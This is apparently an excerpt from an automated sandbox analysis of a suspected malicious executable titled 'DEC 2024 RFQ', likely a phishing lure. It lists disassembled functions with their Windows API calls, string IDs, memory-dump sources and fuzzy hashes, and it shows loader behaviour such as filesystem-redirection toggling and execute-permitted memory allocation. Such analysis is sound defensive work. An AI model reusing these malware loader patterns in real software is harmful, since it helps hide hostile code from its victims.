                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000AF910,00000000,?,?,?,?), ref: 000A79DF
                                                                                                                      • GetWindowLongW.USER32 ref: 000A79FC
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000A7A0C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: c8063f8342d1266f6be4e7e15f34b6f77f2ab0218ba1cd6ee23f082ec412fb68
                                                                                                                      • Instruction ID: cf397dd3e9ac284069795e0dfeb444e6dfa8e4e9cec64aaab5514e33838b1cd6
                                                                                                                      • Opcode Fuzzy Hash: c8063f8342d1266f6be4e7e15f34b6f77f2ab0218ba1cd6ee23f082ec412fb68
                                                                                                                      • Instruction Fuzzy Hash: 2131E131204606AFDB518EB8DC41BEB77A9EB4A324F248725F979A32E1D730ED508B50
                                                                                                                      Function 000A73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 000A7461
                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 000A7475
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000A7499
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: SysMonthCal32
                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                      • Opcode ID: c655d411011abf13db833f94be8ee263fa577dae3f5bf28b3caca0b49690c130
                                                                                                                      • Instruction ID: 7a1d7323fa78c62c4e404cf53f18776ac85d0be09cccde482162cc56d834de00
                                                                                                                      • Opcode Fuzzy Hash: c655d411011abf13db833f94be8ee263fa577dae3f5bf28b3caca0b49690c130
                                                                                                                      • Instruction Fuzzy Hash: AC21BF32500219ABDF218EA4CC42FEA3BA9EB4D724F114214FE596B190DB75AC518BA0
                                                                                                                      Function 000A7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000A7C4A
                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000A7C58
                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000A7C5F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                      • Opcode ID: 8c165ab0bcdcd31916e53386ee71d46a1d1174b4cb078a861eea9c8af036b0f0
                                                                                                                      • Instruction ID: eb39a05999c812676b2785712a75925efe29831231af9ec722945b302dc5d9b1
                                                                                                                      • Opcode Fuzzy Hash: 8c165ab0bcdcd31916e53386ee71d46a1d1174b4cb078a861eea9c8af036b0f0
                                                                                                                      • Instruction Fuzzy Hash: F2218EB5604609AFEB10DF64DCC1DB737EDEF5A3A4B144459FA05AB3A1CB31EC118AA0
                                                                                                                      Function 000A6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000A6D3B
                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000A6D4B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000A6D70
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: f25f688a21bf92b0e99a815c21040bc9de0f1cbed9b085f5a321d05bc4e8235d
                                                                                                                      • Instruction ID: 2f5711fac244a95c802878e24f4012a7a6b03c38053014dd9da54637fd882ed6
                                                                                                                      • Opcode Fuzzy Hash: f25f688a21bf92b0e99a815c21040bc9de0f1cbed9b085f5a321d05bc4e8235d
                                                                                                                      • Instruction Fuzzy Hash: 0721A732610118BFEF518F94DC45FFB37BAEF8A760F058124FA455B190C6729C5187A0
                                                                                                                      Function 000A770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000A7772
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000A7787
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000A7794
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: f485bb0ef380f0fd82a0953a514b83211046ed2a853cfff88afe9c00dbe1f5ff
                                                                                                                      • Instruction ID: de08009fcfb294d0fd8da64bf27479ddee241c30a559c1ef251bd0de48439075
                                                                                                                      • Opcode Fuzzy Hash: f485bb0ef380f0fd82a0953a514b83211046ed2a853cfff88afe9c00dbe1f5ff
                                                                                                                      • Instruction Fuzzy Hash: 72112732204208BAEF205FB0CC01FEB37A9EF89B54F014118F645A6090C271E811CB20
                                                                                                                      Function 00049B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 00049B94
                                                                                                                        • Part of subcall function 00049C0B: __mtinitlocknum.LIBCMT ref: 00049C1D
                                                                                                                        • Part of subcall function 00049C0B: EnterCriticalSection.KERNEL32(00000000,?,00049A7C,0000000D), ref: 00049C36
                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00049BA4
                                                                                                                        • Part of subcall function 00049100: ___addlocaleref.LIBCMT ref: 0004911C
                                                                                                                        • Part of subcall function 00049100: ___removelocaleref.LIBCMT ref: 00049127
                                                                                                                        • Part of subcall function 00049100: ___freetlocinfo.LIBCMT ref: 0004913B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                      • String ID: 8$8
                                                                                                                      • API String ID: 547918592-3868594399
                                                                                                                      • Opcode ID: 21337323f2b6227e04aad554345abf8659660027f6099c2b4b5403b9f68365fd
                                                                                                                      • Instruction ID: 41f3a73d89779f6a590d4cd1d97b133d72dd6cee4c7bddc9d6b9be43950f8a14
                                                                                                                      • Opcode Fuzzy Hash: 21337323f2b6227e04aad554345abf8659660027f6099c2b4b5403b9f68365fd
                                                                                                                      • Instruction Fuzzy Hash: ABE08CB1943700EAEA50BBE4AA03B8F27909B01B31F20417BF0555D1C3CF782840867F
                                                                                                                      Function 00024C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00024BD0,?,00024DEF,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024C11
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00024C23
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                      • Opcode ID: 603b09ace05d972a0106334110a376802aa530c67a144808a24969c293826a22
                                                                                                                      • Instruction ID: 5fe71aee2c3b61c1aa2f351ca1e67734d4f87d6ca2768c3d594f04517f9694f8
                                                                                                                      • Opcode Fuzzy Hash: 603b09ace05d972a0106334110a376802aa530c67a144808a24969c293826a22
                                                                                                                      • Instruction Fuzzy Hash: 90D01230511B23CFD760AFB5ED58656B6E5EF0A352B118C3AD885D6150E7F4D480C660
                                                                                                                      Function 00024C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00024B83,?), ref: 00024C44
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00024C56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                      • Opcode ID: 70a93d84cc1adb3a202c1b0d7f572fead469235343f9806b1d1085c32c6d9389
                                                                                                                      • Instruction ID: 6f9f834411f47d27f006ce0c6da4009fce052e41a83eab29f6a3ffbe02adc1d7
                                                                                                                      • Opcode Fuzzy Hash: 70a93d84cc1adb3a202c1b0d7f572fead469235343f9806b1d1085c32c6d9389
                                                                                                                      • Instruction Fuzzy Hash: 04D0C230510B23CFD7205FB5E81821672E4AF02341B20883AD592DA160E774D480C620
                                                                                                                      Function 000A0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,000A1039), ref: 000A0DF5
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000A0E07
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: 5bf2f914589e3ccdcc4f28f3190507d4292cda49776fcc45fb3071d8c71746bd
                                                                                                                      • Instruction ID: d934f45daa1099a9b724697855d36ff0232de100da37b923056a84948c503146
                                                                                                                      • Opcode Fuzzy Hash: 5bf2f914589e3ccdcc4f28f3190507d4292cda49776fcc45fb3071d8c71746bd
                                                                                                                      • Instruction Fuzzy Hash: 71D0C730440B27CFE3209FB0D80828272E4AF12382F008C3ED582C6250E6B4E890CB20
                                                                                                                      Function 000990E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00098CF4,?,000AF910), ref: 000990EE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00099100
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                      • Opcode ID: 1822099d25f06fcf58e5da8799e50afb122a279f982246b57c849465a72f815f
                                                                                                                      • Instruction ID: 3b00e0390c0135b9bd591c6725c38b2dea0b911e31d3c5e30a30a8f9ef5ddb63
                                                                                                                      • Opcode Fuzzy Hash: 1822099d25f06fcf58e5da8799e50afb122a279f982246b57c849465a72f815f
                                                                                                                      • Instruction Fuzzy Hash: 9CD01234510713CFDB209FB5D85855676E4AF06352B15CC3ED585D6550E774C4C0C760
                                                                                                                      Function 00061714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                      • Opcode ID: 69db49983c1f9566d45208a1ad7897abcb41616be0cb7fe1f47cfa5467e61366
                                                                                                                      • Instruction ID: 30c76bb0e23576f253866420418c5c374492fd0d228a4b09785d457eb4f52432
                                                                                                                      • Opcode Fuzzy Hash: 69db49983c1f9566d45208a1ad7897abcb41616be0cb7fe1f47cfa5467e61366
                                                                                                                      • Instruction Fuzzy Hash: 88D05EB180C219FACB209B90DC8CDFD73BDAB09301F180462F506E2080E2369B94EB21
                                                                                                                      Function 0007717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ecdc87acb957ea282ef389e238c6f67a10bddce6e45b2b36f382fc3a606c75b4
                                                                                                                      • Instruction ID: fd57b71fffd42bec9d684612ec62d63845b4aa115fcacf13a58d6690523d1828
                                                                                                                      • Opcode Fuzzy Hash: ecdc87acb957ea282ef389e238c6f67a10bddce6e45b2b36f382fc3a606c75b4
                                                                                                                      • Instruction Fuzzy Hash: F3C14974E04216EFCB14CFA4C884AAEBBB5FF48744B148598E80DEB251D734EE81DB94
                                                                                                                      Function 0009E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0009E0BE
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0009E101
                                                                                                                        • Part of subcall function 0009D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0009D7C5
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0009E301
                                                                                                                      • _memmove.LIBCMT ref: 0009E314
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3659485706-0
                                                                                                                      • Opcode ID: fd93e133110e8f448ddf09a05554ea583ab6a87075afb68710a7ef05ad5d0a37
                                                                                                                      • Instruction ID: 740c699713997a084872c0038c054f07219ab581c12d6367e5a4ec3f78df9a3c
                                                                                                                      • Opcode Fuzzy Hash: fd93e133110e8f448ddf09a05554ea583ab6a87075afb68710a7ef05ad5d0a37
                                                                                                                      • Instruction Fuzzy Hash: D0C14671A083519FCB54DF28C480A6ABBE4FF89714F04896EF8999B352D731ED45CB82
                                                                                                                      Function 00098093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 000980C3
                                                                                                                      • CoUninitialize.OLE32 ref: 000980CE
                                                                                                                        • Part of subcall function 0007D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0007D5D4
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000980D9
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000983AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 780911581-0
                                                                                                                      • Opcode ID: cdf04b1abe16ae09e5bda5325e604864b9e49de249d7fea1bcd307d6c932097b
                                                                                                                      • Instruction ID: b629eb602aaa419d5646cdf2eb062b2f4b9ab68616663d188a303325ef3897ca
                                                                                                                      • Opcode Fuzzy Hash: cdf04b1abe16ae09e5bda5325e604864b9e49de249d7fea1bcd307d6c932097b
                                                                                                                      • Instruction Fuzzy Hash: 6CA18A756047119FCB50DF64C881B6AB7E4BF8A714F08845CF99A9B3A2CB34ED04DB86
                                                                                                                      Function 00077530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000B2C7C,?), ref: 000776EA
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000B2C7C,?), ref: 00077702
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,000AFB80,000000FF,?,00000000,00000800,00000000,?,000B2C7C,?), ref: 00077727
                                                                                                                      • _memcmp.LIBCMT ref: 00077748
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
